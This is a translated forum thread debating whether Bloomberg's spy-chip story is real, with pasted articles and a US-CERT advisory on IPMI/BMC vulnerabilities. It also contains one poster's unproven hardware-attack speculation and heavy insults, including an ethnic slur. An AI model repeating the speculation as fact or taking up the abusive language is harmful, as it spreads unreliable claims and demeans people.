Military board - Is the big hack real or fake? Let those who know the technology weigh in
w********2
Posts: 632
1
bmi and ipmi are both normal remote network management technologies. Could that little chip open a backdoor into ipmi? ipmi seems to sit below the BIOS, but is ipmi integrated into the CPU, or into the BIOS?
l*******s
Posts: 83
2
Listen to what the American technical people have to say: https://risky.biz/RB517_feature/
w********2
Posts: 632
3
That's just one side of the story.
I'd still like to hear what the technical heavyweights think.
d********m
Posts: 3662
4
No idea; sitting back and waiting for the experts to explain.
w********2
Posts: 632
5
I've seen reports in the past saying that even a CPU, small as it is, could have a backdoor, just like a virtual machine.
So the size of the chip in the Bloomberg report is not the crux of the matter.
a***e
Posts: 27968
6
Of course it's possible. But not just anyone can make a chip. In terms of capability, the US is number one.
With PRISM out there, there's no reason the US government wouldn't go through the big companies. If the CPU had a backdoor in it, nothing would stand a chance.

★ Sent from iPhone App: ChinaWeb 1.1.4

【Quoting w********2】
: bmi and ipmi are both normal remote network management technologies. Could that little chip open a backdoor into ipmi?
: ipmi seems to sit below the BIOS, but is ipmi integrated into the CPU, or into the BIOS?

k*******g
Posts: 7321
7
Damn, putting a spy chip on the motherboard, and visible to the naked eye. Damn, with the American people at this level of intelligence, the US is basically on its way down.
h*********n
Posts: 11319
8
It has to be written dumbly enough for enough of the mob to understand it, so they can gang up and kill the little yellow people.

【Quoting k*******g】
: Damn, putting a spy chip on the motherboard, and visible to the naked eye. Damn, with the American people at this level of intelligence, the US is basically
: on its way down.

w********2
Posts: 632
9
Calling for the experts.
w********2
Posts: 632
10
An Analysis of Image Filtering on WeChat Moments
https://citizenlab.ca/2018/08/cant-picture-this-an-analysis-of-image-filtering-on-wechat-moments/
M*P
Posts: 6456
11
Whatever you say, unless you think your opponent's technical level is many levels below yours, a hardware backdoor is suicide, because it's far too easy to discover.

:bmi and ipmi are both normal remote network management technologies. Could that little chip open a backdoor into ipmi? ipmi seems to sit below the BIOS, but is ipmi integrated into the CPU, or into the BIOS?
s********i
Posts: 17328
12
Technically it's certainly feasible. Think about it: something as complex as a CPU has bugs; wasn't that Meltdown and Spectre business a while ago exactly that... These things are all backdoor vulnerabilities that can be exploited when needed.
s********i
Posts: 17328
13
How many years were Meltdown and Spectre sitting in the CPU? Not that easy to discover. Of course, that's not to say what Bloomberg says is true.

【Quoting M*P】
: Whatever you say, unless you think your opponent's technical level is many levels below yours, a hardware backdoor is suicide, because it's far too easy
: to discover.
:
: :bmi and ipmi are both normal remote network management technologies. Could that little chip open a backdoor into ipmi? ipmi seems to sit below the BIOS,
: but is ipmi integrated into the CPU, or into the BIOS?

w********2
Posts: 632
14
AFTER MELTDOWN AND SPECTRE, ANOTHER SCARY CHIP FLAW EMERGES
https://www.wired.com/story/speculative-store-bypass-spectre-meltdown-vulnerability/
G******g
Posts: 2275
15
I don't believe that was a bug.

【Quoting s********i】
: Technically it's certainly feasible. Think about it: something as complex as a CPU has bugs; wasn't that Meltdown and Spectre business a while ago
: exactly that... These things are all backdoor vulnerabilities that can be exploited when needed.

M*P
Posts: 6456
16
Meltdown is a design problem, and it's hidden inside a complex CPU. Bloomberg's thing is a component placed on the motherboard; the two are worlds apart.

:How many years were Meltdown and Spectre sitting in the CPU? Not that easy to discover. Of course, that's not to say what Bloomberg says is true.
:【Quoting MHP (马后炮)】
s********i
Posts: 17328
17
These things are all the same: once something gets complex, there are holes to exploit, hardware and software alike, whether man-made or accidental. It's hard for those who can't and easy for those who can. The author of the Panda Burning Incense virus only finished middle school and didn't even get into high school.

【Quoting M*P】
: Meltdown is a design problem, and it's hidden inside a complex CPU. Bloomberg's thing is a component placed on the motherboard; the two are worlds
: apart.
:
: :How many years were Meltdown and Spectre sitting in the CPU? Not that easy to discover. Of course, that's not to say what Bloomberg says is true.
: :【Quoting MHP (马后炮)】

j*******n
Posts: 10868
18
It's 100% certain that any software or hardware has bugs; discovering them is only a matter of time. But what Bloomberg describes is alien-level technology; if the CCP had that kind of technology, the US would have been surpassed long ago.

【Quoting s********i】
: These things are all the same: once something gets complex, there are holes to exploit, hardware and software alike, whether man-made or accidental.
: It's hard for those who can't and easy for those who can. The author of the Panda Burning Incense virus only finished middle school and didn't even get into high school.

M*P
Posts: 6456
19
With that kind of sweeping, broad-brush thinking, you could go hang out with that Bloomberg reporter.

:These things are all the same: once something gets complex, there are holes to exploit, hardware and software alike, whether man-made or accidental. It's hard for those who can't and easy for those who can. The author of the Panda Burning Incense virus only finished middle school and didn't even get into high school.
:【Quoting MHP (马后炮)】
w********2
Posts: 632
20
It's people like you, who have already decided the Bloomberg story is fake news, who show the clear wumao stance.

【Quoting M*P】
: With that kind of sweeping, broad-brush thinking, you could go hang out with that Bloomberg reporter.
:
: :These things are all the same: once something gets complex, there are holes to exploit, hardware and software alike, whether man-made or accidental.
: It's hard for those who can't and easy for those who can. The author of the Panda Burning Incense virus only finished middle school and didn't even get into high school.
: :【Quoting MHP (马后炮)】

w********2
Posts: 632
21
IPMI: The most dangerous protocol you've never heard of
IPMI could be punching holes in your corporate defenses.

By Paul F. Roberts
ITworld | AUGUST 19, 2013
You spend thousands or even hundreds of thousands of dollars to secure the
data stored on the critical databases and application servers your
organization relies on. But what if each of those systems secretly harbored
a powerful, hardware-based back door that would give a remote attacker total
control of the system? And what if that backdoor wasn't planted by some
shadowy hacker group operating out of the former Soviet republics, but by
the multi-billion dollar Western company that sold you the server in the
first place?
If that sounds fantastic, I've got one word...err...acronym for you: IPMI,
and it's turning into the new four-letter word in security. IPMI stands for
Intelligent Platform Management Interface. It's a powerful protocol that is
supported by much late-model server hardware from major manufacturers like
Dell, HP, Oracle and Lenovo.
At the 100,000-foot level, IPMI can be understood as technology that gives
administrators almost total control over remotely deployed servers. IPMI and
now-standard hardware called a Baseboard Management Controller (BMC) - let
remote administrators monitor the health of servers, deploy (or remove)
software, manage hardware peripherals like the keyboard and mouse, reboot
the system and update software on it.
You'd think with that kind of power, IPMI would be a fortress: secure
against remote hackers and malware based attacks. But you'd be wrong.
Instead, researchers who have looked at implementations of IPMI have found
just the contrary: that remotely exploitable vulnerabilities in IPMI
implementations from major vendors are widespread, potentially giving a
remote attacker total control over a vulnerable operating system. The most
recent revelation about IPMI insecurity came last week in Washington D.C. at
WOOT '13, the 7th annual USENIX Workshop on Offensive Technologies. (Get it?
WOOT!) In a presentation there, Anthony Bonkoski, Russ Bielawski and J.
Alex Halderman of the University of Michigan presented the findings of
research on a common IPMI implementation from the server OEM Supermicro.
They found that the IPMI firmware, developed by ATEN Technologies, contained
"numerous, textbook security flaws" that included buffer overflow
vulnerabilities, privilege escalation vulnerabilities and shell injection.
They then demonstrated an attack leveraging one of those: a buffer overflow
in a web interface used to access the IPMI feature to remotely
obtain a root shell on the BMC.
The University of Michigan research is just the latest in a string of
worrying reports on issues around IPMI. Notably, the security researcher Dan
Farmer, working as part of a DARPA-funded research project, was among the
first to sound the alarm on IPMI, in a paper first published in January.
(The research was recently updated.)
Farmer's analysis raised many of the same concerns as the University of
Michigan study. In it, Farmer identified a wide range of security flaws in
the firmware that runs the Baseboard Management Controller, which he
described as "a bloodsucking leech" attached to the motherboard of servers
that use IPMI.
In an e-mail, Farmer said the University of Michigan work confirmed what he
suspected about the IPMI protocol and, more pointedly, the BMC component.
BMCs were rife with exploitable vulnerabilities that had yet to be
discovered or explored, Farmer said. "I talked about the appearance of
really shoddy work on a visceral level in my own work - poorly written shell
scripts, bad architecture, just terrible security design," he told me in an
e-mail. "I suspect if they looked ...at other vendors there wouldn't be all
that much difference. Each time I look at these things another piece falls
off, it's amazing we've held it all together as long as we have."
Others have taken notice. HD Moore, the author of the Metasploit penetration
testing tool and the Chief Research Officer at the security firm Rapid7,
published a "Penetration Tester's Guide to IPMI and BMCs" in July that built
on Farmer's research, highlighting some of the major vulnerabilities in
IPMI and BMCs and providing tips to professional penetration testers about
how to exploit them - taking advantage of default username and passwords
that haven't been changed, or bypassing authentication or brute forcing
usernames and passwords using known vulnerabilities.
Farmer's work and Moore's "guide" to breaking IPMI and BMCs prompted the
Department of Homeland Security to issue an alert in late July about the
security of systems that use IPMI. "Attackers can easily identify and access
systems that run IPMI and are connected to the Internet," CERT warned. "It
is important to restrict IPMI access to specific management IP addresses
within an organization and preferably separated into a separate LAN segment."
In an e-mail, Moore told me that he has received numerous reports from
professional penetration testers working in the field about successful
exploits of systems using IPMI. "In almost all cases, they were able to use
the information and code provided to gain access to an important target of
their test," he wrote. That doesn't mean that IPMI and BMC hacks are being
used outside of controlled tests (or "in the wild,") but Moore thinks it is
likely that they will be eventually, if they haven't already. So what's a
company to do? As is often the case, the level of risk from IPMI devices
"depends": in this case, the risk of attack due to IPMI depends on how an
organization's servers are managed. "Companies using dedicated servers from
public providers will be directly exposed to the most dangerous types of
attacks," Moore said. Other firms, managing their own hardware, may yet
leave IPMI enabled on internal servers, which can allow an intruder with
internal network access to gain access to critical systems, Moore warned.
Farmer has published a list of security best practices to use with systems
that support IPMI. They include "severely restricting" access to any BMC,
beefing up authentication requirements and isolating systems with a BMC and
supporting IPMI from being able to access the public Internet. (That would
seem to be a no-brainer, but the University of Michigan researchers found
more than 100,000 such servers that were reachable via public Internet
searches and scans.)
Moore echoes that advice. "The best way to mitigate IPMI is to disable it or
place the IPMI interface on a dedicated and physically isolated network,"
Moore wrote.
c****3
Posts: 10787
22
If the protocol design has a flaw, then spell out specifically how it can be exploited and how a hardware backdoor could be placed; a simulation in software would do too.
If you can't state or do a single one of the above, it's just hot air.
w********2
Posts: 632
23
Looks like the Bloomberg reporter wasn't wrong: ipmi itself is far too insecure, and that add-on little chip may automatically reset ipmi to its initial state, which makes it easy for people outside the local network to hack.
c****3
Posts: 10787
24
That's not how security is done.
Every program has security holes; there's no such thing as a bug-free program. Protocol designs can have flaws too.
But if you say this one has a hole or a backdoor, you have to point out specifically where the problem is and where it can be exploited. If you can't be specific, it's hot air. Computer science isn't writing papers on guesswork; it has to be concrete.
If you can't say specifically where the problem or the hole is, then it's secure; that's how it has always been done. Otherwise no program would be secure, because no program is free of bugs.

【Quoting w********2】
: Looks like the Bloomberg reporter wasn't wrong: ipmi itself is far too insecure, and that add-on little chip may automatically reset ipmi
: to its initial state, which makes it easy for people outside the local network to hack.

w********2
Posts: 632
25
Because ordinary network administrators know ipmi has problems and will turn ipmi off. Resetting to the initial state actually means ipmi gets enabled, so the related vulnerabilities can be exploited. That's hard to detect, because it only enables ipmi and does nothing more, so there's nothing suspicious about it, and it's easy to do in hardware: it's just a device like an automatic flasher.

【Quoting w********2】
: Looks like the Bloomberg reporter wasn't wrong: ipmi itself is far too insecure, and that add-on little chip may automatically reset ipmi
: to its initial state, which makes it easy for people outside the local network to hack.

w********2
Posts: 632
26
You liberal-arts wumao, stop trying to bluff; you don't understand the technology at all.

【Quoting c****3】
: That's not how security is done.
: Every program has security holes; there's no such thing as a bug-free program. Protocol designs can have flaws too.
: But if you say this one has a hole or a backdoor, you have to point out specifically where the problem is and where it can be exploited. If you can't
: be specific, it's hot air. Computer science isn't writing papers on guesswork; it has to be concrete.
: If you can't say specifically where the problem or the hole is, then it's secure; that's how it has always been done. Otherwise no program
: would be secure, because no program is free of bugs.

c****3
Posts: 10787
27
You're the liberal-arts one; you don't know jack about CS.

【Quoting w********2】
: You liberal-arts wumao, stop trying to bluff; you don't understand the technology at all.
w********2
Posts: 632
28
I was playing with gopher when you were still in kindergarten.

【Quoting c****3】
: You're the liberal-arts one; you don't know jack about CS.
c****3
Posts: 10787
29
With your lousy skills, you don't even know how security gets evaluated.

【Quoting w********2】
: I was playing with gopher when you were still in kindergarten.
w********2
Posts: 632
30
Got blocked.
w********2
Posts: 632
31
A Penetration Tester's Guide to IPMI and BMCs
https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
w********2
Posts: 632
32
Alert (TA13-207A)
Risks of Using the Intelligent Platform Management Interface (IPMI)
Original release date: July 26, 2013 | Last revised: October 07, 2016
Systems Affected
Any system connected to the internet running the Intelligent Platform
Management Interface (IPMI) may be affected. IPMI is resident on many server
platforms, and provides low-level access to a system that can override
operating system controls.
Overview
Attackers can easily identify and access systems that run IPMI and are
connected to the Internet. It is important to restrict IPMI access to
specific management IP addresses within an organization and preferably
separated into a separate LAN segment.
Description
What is the Intelligent Platform Management Interface (IPMI)?
IPMI is a low level interface specification that has been adopted by many
hardware vendors. It allows a system administrator to remotely manage
servers at the hardware level. IPMI runs on the Baseboard Management
Controller (BMC) and provides access to the BIOS, disks, and other hardware.
It also supports remote booting from a CD or through the network, and
monitoring of the server environment. The BMC itself also runs a limited
set of network services to facilitate management and communications amongst
systems.
What Is the Risk?
Attackers can use IPMI to essentially gain physical-level access to the
server. An attacker can reboot the system, install a new operating system,
or compromise data, bypassing any operating system controls. Some issues
identified by Dan Farmer:
Passwords for IPMI authentication are saved in clear text.
Knowledge of one IPMI password gives you the password for all computers in
the IPMI managed group.
Root access on an IPMI system grants complete control over hardware,
software, firmware on the system.
BMCs often run excess and older network services that may be vulnerable.
IPMI access may also grant remote console access to the system, resulting in
access to the BIOS.
There are few, if any, monitoring tools available to detect if the BMC is
compromised.
Certain types of traffic to and from the BMC are not encrypted.
Unclear documentation on how to sanitize IPMI passwords without destruction
of the motherboard.
Attackers can easily search and identify internet-connected target systems,
and IPMI is no exception.
Impact
An attacker with knowledge of IPMI can search for, and find, open management
interfaces. Many of these interfaces utilize default or no passwords, or
weak encryption. Further consequences depend on the type and use of the
compromised system. At the very least, an attacker can compromise
confidentiality, integrity, and availability of the server once gaining
access to the BMC.
Solution
Restrict IPMI to Internal Networks
Restrict IPMI traffic to trusted internal networks. Traffic from IPMI (
usually UDP port 623) should be restricted to a management VLAN segment with
strong network controls. Scan for IPMI usage outside of the trusted
network and monitor the trusted network for abnormal activity.
Utilize Strong Passwords
Devices running IPMI should have strong, unique passwords set for the IPMI
service. See US-CERT Security Tip ST04-002 and Password Security,
Protection, and Management for more information on password security.
Encrypt Traffic
Enable encryption on IPMI interfaces, if possible. Check your manufacturer
manual for details on how to set up encryption.
Require Authentication
"cipher 0" is an option enabled by default on many IPMI enabled devices that
allows authentication to be bypassed. Disable "cipher 0" to prevent
attackers from bypassing authentication and sending arbitrary IPMI commands.
Anonymous logins should also be disabled.
Sanitize Flash Memory at End of Life
Follow manufacturer recommendations for sanitizing passwords. If none
exists, destroy the flash chip, motherboard, or other areas the IPMI
password may be stored.
Identify Affected Products
Most server products
HP Integrated Lights Out
Dell DRAC
IBM Remote Supervisor Adapter
Vendor Information
Dell has provided the following information related to this Technical Alert:
https://www.dell.com/support/Manuals/us/en/555/Product/integrated-dell-remote-access-cntrllr-6-ent-for-blade-srvr-v3.5
http://www.dell.com/support/Manuals/us/en/555/Product/integrated-dell-remote-access-cntrllr-7-v1.40.40
http://www.dell.com/support/Manuals/us/en/555/Product/integrated-dell-remote-access-cntrllr-6-for-monolithic-srvr-v1.95
References
A Penetration Tester's Guide to IPMI and BMCs
Dan Farmer's IPMI++ Security Best Practices
Revisions
July 26, 2013 - Initial Release
October 3, 2013 - Added Vendor Information
w********2
Posts: 632
33
There are few, if any, monitoring tools available to detect if the BMC is
compromised.
w********2
Posts: 632
34
Bloomberg may have understated it; servers may have been hacked long ago, but without the relevant software nobody can find out.
s******g
Posts: 536
35
These are all remote attacks exploiting protocol flaws; that's a completely different matter from inserting a chip on the motherboard.
If the commie bandits could do the latter, there'd be no need to fight the trade war; the US could just surrender.

【Quoting w********2】
: Alert (TA13-207A)
: Risks of Using the Intelligent Platform Management Interface (IPMI)
: Original release date: July 26, 2013 | Last revised: October 07, 2016
: Systems Affected
: Any system connected to the internet running the Intelligent Platform
: Management Interface (IPMI) may be affected. IPMI is resident on many server

c****3
Posts: 10787
36
Posting these out-of-date things is useless.
There's no absolutely secure software in this world; tomorrow Windows or iOS might turn up a security hole. The same goes for every protocol. On the hardware side, Intel just had a CPU vulnerability.
So everything is constantly being patched. If a hole can't be patched, the advice is to turn the thing off, or simply remove it.
If you can't say where the problem is, then it's secure.
This is current security practice; if you don't even know this, you're an outsider chasing shadows, obviously from biology or some such liberal-arts field.

【Quoting w********2】
: A Penetration Tester's Guide to IPMI and BMCs
: https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

S***s
Posts: 104
37
He probably doesn't understand at all. By the fake-news logic, Intel's CPU bugs were all maliciously planted.

【Quoting c****3】
: Posting these out-of-date things is useless.
: There's no absolutely secure software in this world; tomorrow Windows or iOS might turn up a security hole. The same goes for every protocol.
: On the hardware side, Intel just had a CPU vulnerability.
: So everything is constantly being patched. If a hole can't be patched, the advice is to turn the thing off, or simply remove it.
: If you can't say where the problem is, then it's secure.
: This is current security practice; if you don't even know this, you're an outsider chasing shadows, obviously from biology
: or some such liberal-arts field.

s********i
Posts: 17328
38
Let me give you an analogy; it may not be perfect, but bear with it; it also partly answers the questions in the posts above. Say someone makes safes, and he fits a hidden lock in the safe (undetectable without an X-ray), and only he has the key to this hidden lock. He goes and installs this safe for everyone. Then the following facts hold:
1. Will the safe definitely be robbed? Obviously not, because you still have other security measures, such as doormen, cameras, security doors and so on. Big companies have more complete security; small companies and sole traders may be relying entirely on that safe.
2. Does the safe necessarily hold valuables? Obviously not; it could be confidential documents. If one day the safe is opened with this hidden lock (say, on a day when your other security measures also have a gap), the confidential documents get read, then put back and locked up again. If your other security measures aren't strong, you won't notice that the confidential documents are no longer confidential.
3. Suppose one day you X-ray the safe and find the hidden lock, but you can't prove whether it can be opened, because you don't have the key. Since you can't prove the hidden lock can be opened, do you conclude the lock doesn't exist?
4. Will the safe manufacturer suddenly become a powerhouse company? Obviously not, because what he can steal is limited. But he may be stealing anytime, anywhere, and it adds up; besides, it's better than stealing nothing, right? Otherwise, by your logic, thieves would be the richest people in the world.
So what can you do, and what should you do? Replace the safes with the hidden lock, of course, and demand answers from the safe maker.

【Quoting j*******n】
: It's 100% certain that any software or hardware has bugs; discovering them is only a matter of time. But what Bloomberg describes is alien-level technology;
: if the CCP had that kind of technology, the US would have been surpassed long ago.

j*******n
Posts: 10868
39
Damn, countless people have told you countless times and you still don't get it... The software and hardware vulnerabilities you posted exist, 100%, and are common knowledge to the masses... But sticking a tube into a circuit board to suck blood is alien-level technology; if China had mastered it, it would have long since beaten the US flat on technology, and it would be the US scheming to steal China's information.

【Quoting w********2】
: There are few, if any, monitoring tools available to detect if the BMC is
: compromised.

j*******n
Posts: 10868
40
Completely inapt... The problem now is that this hidden lock can't be built with current technology; if it could be built, China's technology would already be sky-high and the US would be scheming to steal China's technology.
So everything you said is science fiction.

【Quoting s********i】
: Let me give you an analogy; it may not be perfect, but bear with it; it also partly answers the questions in the posts above. Say someone
: makes safes, and he fits a hidden lock in the safe (undetectable without an X-ray), and only he has the key to this hidden lock.
: He goes and installs this safe for everyone. Then the following facts hold:
: 1. Will the safe definitely be robbed? Obviously not, because you still have other security measures, such as doormen, cameras,
: security doors and so on. Big companies have more complete security; small companies and sole traders may be relying entirely on that safe.
: 2. Does the safe necessarily hold valuables? Obviously not; it could be confidential documents. If one day the safe is opened with this hidden lock
: (say, on a day when your other security measures also have a gap), the confidential documents get read, then put back
: and locked up again. If your other security measures aren't strong, you won't notice that the confidential documents are no longer confidential.
: 3. Suppose one day you X-ray the safe and find the hidden lock, but you can't prove whether it can be opened, because
: you don't have the key. Since you can't prove the hidden lock can be opened, do you conclude the lock doesn't exist?

s*********2
Posts: 1572
41
Could the old generals possibly understand? All the old generals need is to bash China: on one hand cursing the mainland's chip technology as backward, on the other saying the mainland can hack intelligence, and then twisting things every which way to prove it isn't anything advanced.

【Quoting j*******n】
: Damn, countless people have told you countless times and you still don't get it... The software and hardware vulnerabilities you posted exist, 100%,
: and are common knowledge to the masses... But sticking a tube into a circuit board to suck blood is alien-level
: technology; if China had mastered it, it would have long since beaten the US flat on technology, and it would be the US scheming to steal
: China's information.

j*******n
Posts: 10868
42
Let me give you an analogy, a very apt one; read carefully and see if you can understand it...
Bloomberg says China fitted a magical hidden lock to the safe and everyone's money is now controlled by China... Then everyone points out that this legendary magical lock could only exist in science fiction... You, meanwhile, keep following Bloomberg's sci-fi line: what a magical lock!

【Quoting s********i】
: Let me give you an analogy; it may not be perfect, but bear with it; it also partly answers the questions in the posts above. Say someone
: makes safes, and he fits a hidden lock in the safe (undetectable without an X-ray), and only he has the key to this hidden lock.
: He goes and installs this safe for everyone. Then the following facts hold:
: 1. Will the safe definitely be robbed? Obviously not, because you still have other security measures, such as doormen, cameras,
: security doors and so on. Big companies have more complete security; small companies and sole traders may be relying entirely on that safe.
: 2. Does the safe necessarily hold valuables? Obviously not; it could be confidential documents. If one day the safe is opened with this hidden lock
: (say, on a day when your other security measures also have a gap), the confidential documents get read, then put back
: and locked up again. If your other security measures aren't strong, you won't notice that the confidential documents are no longer confidential.
: 3. Suppose one day you X-ray the safe and find the hidden lock, but you can't prove whether it can be opened, because
: you don't have the key. Since you can't prove the hidden lock can be opened, do you conclude the lock doesn't exist?

s********i
Posts: 17328
43
My analogy has no direct relation to Bloomberg's claim. I made it very clear: the hidden lock exists; whether it's a super lock is a matter of degree, not of kind. For example, if an old lady finds a hidden lock on her safe, no amount of cursing on her part is excessive, even though she knows nothing about safes.

【Quoting j*******n】
: Let me give you an analogy, a very apt one; read carefully and see if you can understand it...
: Bloomberg says China fitted a magical hidden lock to the safe and everyone's money is now controlled by China... Then
: everyone points out that this legendary magical lock could only exist in science fiction... You, meanwhile, keep following Bloomberg's sci-fi
: line: what a magical lock!

s********i
Posts: 17328
44
What hidden lock can't be built? Didn't they build Meltdown and Spectre into something as mighty as the CPU?

【Quoting j*******n】
: Completely inapt... The problem now is that this hidden lock can't be built with current technology; if it could be built, China's
: technology would already be sky-high and the US would be scheming to steal China's technology.
: So everything you said is science fiction.

s*******7
Posts: 1302
45
That was presumably embedded by the CPU's designers; it's not something a hacker or a PCB vendor could put in on their own initiative.
How is that the same?

【Quoting s********i】
: What hidden lock can't be built? Didn't they build Meltdown and Spectre into something as mighty as the CPU?
j*******n
Posts: 10868
46
Hackers exploiting software and hardware vulnerabilities? That's practically 100% certain; the masses have long known it and there's no hype value in it... State-led cyber warfare? I think there's a 99% chance it exists: Russia, the US, China, even Taiwan; everyone on earth knows. But can hyping that hit China's supply chain? No use.
So Bloomberg had to find another angle.

【Quoting s********i】
: My analogy has no direct relation to Bloomberg's claim. I made it very clear: the hidden lock exists; whether it's a super
: lock is a matter of degree, not of kind. For example, if an old lady finds a hidden lock on her safe, no amount of cursing
: on her part is excessive, even though she knows nothing about safes.

j*******n
Posts: 10868
47
That chips have vulnerabilities is practically a certainty... but that can't hit China's supply chain, so all that's left is the sci-fi of a grenade tucked into the circuit board.
Besides, the only one who can build a CPU and hide a Meltdown in it is the US; if China had that ability, the trade war wouldn't need fighting either; the US could just surrender.

【Quoting s********i】
: What hidden lock can't be built? Didn't they build Meltdown and Spectre into something as mighty as the CPU?
j*******n
Posts: 10868
48
Actually, apart from Bloomberg alone stubbornly doubling down with two stories, not a single mainstream outlet has followed up, dug deeper or hyped it, which already says a lot... With a topic this hot, if there were even a shred of substance, there's no reason other media would give it the cold shoulder.
w********2
Posts: 632
49
Because ordinary network administrators know ipmi has problems and will turn ipmi off. Resetting to the initial state actually means ipmi gets enabled, so the related vulnerabilities can be exploited. That's hard to detect, because it only enables ipmi and does nothing more, so there's nothing suspicious about it, and it's easy to do in hardware: it's just a device like an automatic flasher.

【Quoting c****3】
: Posting these out-of-date things is useless.
: There's no absolutely secure software in this world; tomorrow Windows or iOS might turn up a security hole. The same goes for every protocol.
: On the hardware side, Intel just had a CPU vulnerability.
: So everything is constantly being patched. If a hole can't be patched, the advice is to turn the thing off, or simply remove it.
: If you can't say where the problem is, then it's secure.
: This is current security practice; if you don't even know this, you're an outsider chasing shadows, obviously from biology
: or some such liberal-arts field.

w********2
Posts: 632
50
Because ordinary network administrators know ipmi has problems and will turn ipmi off. Resetting to the initial state actually means ipmi gets enabled, so the related vulnerabilities can be exploited. That's hard to detect, because it only enables ipmi and does nothing more, so there's nothing suspicious about it, and it's easy to do in hardware: it's just a device like an automatic flasher.

【Quoting j*******n】
: Damn, countless people have told you countless times and you still don't get it... The software and hardware vulnerabilities you posted exist, 100%,
: and are common knowledge to the masses... But sticking a tube into a circuit board to suck blood is alien-level
: technology; if China had mastered it, it would have long since beaten the US flat on technology, and it would be the US scheming to steal
: China's information.

w********2
Posts: 632
51
A bunch of liberal-arts wumao who can't even understand my technical hypothesis, fantasizing away here. Utterly laughable. Anyone who doesn't understand even this and still argues can basically be judged a wumao, and a liberal-arts one at that.
w********2
Posts: 632
52
To flash the bmi, all it takes is a jumper plus a ROM storing a few activation commands; it can be made very small.
c****3
Posts: 10787
53
As I told you, everyone has long known IPMI isn't secure enough, and all kinds of patches have been added.
If you say that with all those patches it's still insecure, you need to produce evidence.
That's how security assessment works; without evidence you're a fraud and nobody will believe you.

【Quoting w********2】
: Because ordinary network administrators know ipmi has problems and will turn ipmi off. Resetting to the initial state actually means
: ipmi gets enabled, so the related vulnerabilities can be exploited. That's hard to detect, because it only enables ipmi and does
: nothing more, so there's nothing suspicious about it, and it's easy to do in hardware: it's just a device like an automatic
: flasher.

w********2
Posts: 632
54
You liberal-arts wumao, can you even understand my technical hypothesis? If you can't, don't embarrass yourself.

【Quoting c****3】
: As I told you, everyone has long known IPMI isn't secure enough, and all kinds of patches have been added.
: If you say that with all those patches it's still insecure, you need to produce evidence.
: That's how security assessment works; without evidence you're a fraud and nobody will believe you.

c****3
Posts: 10787
55
You biology liberal-arts type, stop embarrassing yourself about computers.

【Quoting w********2】
: You liberal-arts wumao, can you even understand my technical hypothesis? If you can't, don't embarrass yourself.
w********2
Posts: 632
56
Back then ipmi was hailed as the network administrator's savior; in under 10 years it turned into dog shit nobody wants.
w********2
Posts: 632
57
When I was using Norton Utilities to look up the hex signature strings of DOS viruses and disinfecting in assembly language, you were still in the womb.

【Quoting c****3】
: You biology liberal-arts type, stop embarrassing yourself about computers.
w********2
Posts: 632
58
Anthony Bonkoski, Russ Bielawski and J. Alex Halderman of the University of
Michigan presented the findings of research on a common IPMI implementation
from the server OEM Supermicro. They found that the IPMI firmware, developed
by ATEN Technologies, contained "numerous, textbook security flaws" that
included buffer overflow vulnerabilities, privilege escalation
vulnerabilities and shell injection. They then demonstrated an attack
leveraging one of those: a buffer overflow in a web interface used to
access the IPMI feature to remotely obtain a root shell on the BMC.
w********2
Posts: 632
59
Use a small chip as a timed electric jumper to flash away ipmi, or the BIOS, or the ME; plenty of low-level vulnerabilities then come out, and combined with a remote network attack it should be doable. Bloomberg mentioned that this small chip looks like a jumper; that may be exactly what it's for.
t******x
Posts: 55
60
Stop bumping your own thread; you look just like a liberal-arts student. How security is done in the computer industry has been explained clearly by others, and you're still bumping.
w********2
Posts: 632
61
You don't know shit, and you're still arguing with me here. Plenty of programmers on this board have worse hardware and software skills than I do.

【Quoting t******x】
: Stop bumping your own thread; you look just like a liberal-arts student. How security is done in the computer industry has been explained clearly by others, and you're still bumping.
t******x
Posts: 55
62
You're just an outsider liberal-arts type; programmers can tell at a glance. Yelling all day without a bit of actual work.
If you can write a program that hacks in, that's real; that's actual work.
You can't write that kind of program, can you?

【Quoting w********2】
: You don't know shit, and you're still arguing with me here. Plenty of programmers on this board have worse hardware and software skills than I do.
k**0
Posts: 19737
63
Exactly, so idiotic; the old generals were always morons, and still insist on posing as tech gurus. Hilarious.

【Quoting s*********2】
: Could the old generals possibly understand? All the old generals need is to bash China: on one hand cursing the mainland's chip technology as backward, on the other saying the mainland
: can hack intelligence, and then twisting things every which way to prove it isn't anything advanced.

w********2
Posts: 632
64
How would you know I've published papers on programming? You liberal-arts wumao, how would you know that in biology research there are people like me who mainly do computing. Heh.

【Quoting t******x】
: You're just an outsider liberal-arts type; programmers can tell at a glance. Yelling all day without a bit of actual work.
: If you can write a program that hacks in, that's real; that's actual work.
: You can't write that kind of program, can you?

w********2
Posts: 632
65
This thread has become a wumao-exposing thread; damn, some IDs that normally look respectable turn out to be liberal-arts wumao. Damn it.

【Quoting k**0】
: Exactly, so idiotic; the old generals were always morons, and still insist on posing as tech gurus. Hilarious.
t******x
Posts: 55
66
You spamming perpetual postdocs can't change your nature; wherever you go you just spam.
We programmers don't care about these toilet-paper articles; if you want to hack, write your own program, find the vulnerability, and prove you can actually get in and there really is a hole.
In computing, papers are toilet paper; those who won't get their own hands dirty get looked down on everywhere.

【Quoting w********2】
: How would you know I've published papers on programming? You liberal-arts wumao, how would you know that in biology research there are people like me
: who mainly do computing. Heh.

w********2
Posts: 632
67
If you really understood computers, you'd know the weight of my line calling you liberal-arts wumao:
"When I was using Norton Utilities to look up the hex signature strings of DOS viruses and disinfecting in assembly language, you were still in the womb."

【Quoting t******x】
: You spamming perpetual postdocs can't change your nature; wherever you go you just spam.
: We programmers don't care about these toilet-paper articles; if you want to hack, write your own program, find the vulnerability, and prove you can actually
: get in and there really is a hole.
: In computing, papers are toilet paper; those who won't get their own hands dirty get looked down on everywhere.

w********2
Posts: 632
68
Also, I didn't expect you to be a liberal-arts wumao, heh. The credit you built up over time is now used up. Haha.

【Quoting t******x】
: You spamming perpetual postdocs can't change your nature; wherever you go you just spam.
: We programmers don't care about these toilet-paper articles; if you want to hack, write your own program, find the vulnerability, and prove you can actually
: get in and there really is a hole.
: In computing, papers are toilet paper; those who won't get their own hands dirty get looked down on everywhere.

w********2
Posts: 632
69
Baseboard Management Controllers (BMCs) are a type of embedded computer used
to provide out-of-band monitoring for desktops and servers. These products
are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM,
Fujitsu iRMC, IBM IMM, and Supermicro IPMI. BMCs are often implemented as
embedded ARM systems, running Linux and connected directly to the
southbridge of the host system's motherboard. Network access is obtained
